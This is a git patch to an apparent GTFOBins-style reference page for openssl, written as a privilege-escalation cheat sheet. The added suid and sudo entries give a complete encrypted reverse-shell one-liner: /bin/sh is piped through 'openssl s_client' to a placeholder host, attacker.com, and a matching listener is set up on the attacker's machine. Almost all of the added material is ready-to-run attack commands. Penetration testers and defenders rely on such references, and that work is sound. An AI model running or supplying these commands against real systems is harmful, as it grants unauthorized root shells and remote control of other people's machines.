From 58e517563c70c5fa65e52714680d7ba7747342ae Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Wed, 6 Mar 2019 14:08:42 +0100
Subject: [PATCH] Add suid/sudo accordingly to openssl

---
 _gtfobins/openssl.md | 26 +++++++++++++++++++++++---
 1 file changed, 23 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md
index 7e0e424..3f0dc35 100644
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
@@ -52,11 +52,31 @@ functions:
         LFILE=file_to_read
         openssl enc -in "$LFILE"
   suid:
+    - description: |
+        To receive the shell run the following on the attacker box:
+
+            openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+            openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+        Communication between attacker and target will be encrypted.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
+
     - code: |
         LFILE=file_to_write
         echo DATA | openssl enc -out "$LFILE"
   sudo:
-    - code: |
-        LFILE=file_to_write
-        echo DATA | sudo openssl enc -out "$LFILE"
+    - description: |
+        To receive the shell run the following on the attacker box:
+
+            openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+            openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+        Communication between attacker and target will be encrypted.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
 ---